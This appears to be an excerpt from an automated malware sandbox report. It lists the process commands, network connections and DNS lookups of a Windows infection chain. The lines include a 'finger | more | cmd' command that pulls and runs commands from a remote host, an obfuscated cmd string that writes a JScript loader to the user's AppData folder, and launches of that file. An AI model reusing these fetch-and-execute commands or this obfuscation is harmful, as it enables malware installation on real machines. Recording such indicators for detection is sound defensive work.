Technical Information
- '<SYSTEM32>\finger.exe' ok@50iorv.bvcxss.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\jS7.js"
- %LOCALAPPDATA%\js7.js
- '50####.bvcxss.xyz':79
- 'xd####.xczvad.buzz':80
- 'cl###flare.com':443
- 'microsoft.com':80
- '50####.bvcxss.xyz':79
- 'cl###flare.com':443
- DNS ASK 50####.bvcxss.xyz
- DNS ASK xd####.xczvad.buzz
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@50iorv.bvcxss.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt FCCR=.j&&SEt FNKAJ=vHR03arHR03 a =HR03 'scHR03riHR03ptHR03:'; b =HR03 'hHR03TtPHR03:'; GHR03etHR03ObjHR03ecHR03t(HR03a+b+'&&sET XJR6=ITOECITOECxdiaew.xczvad.buzzITOEC?1ITOEC')&&sEt/...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p LTN86="%FNKAJ:HR03=%%XJR6:ITOEC=/%" 0<nul 1>%LOCALAPPDATA%\jS7%FCCR%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\jS7%FCCR%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\jS7.js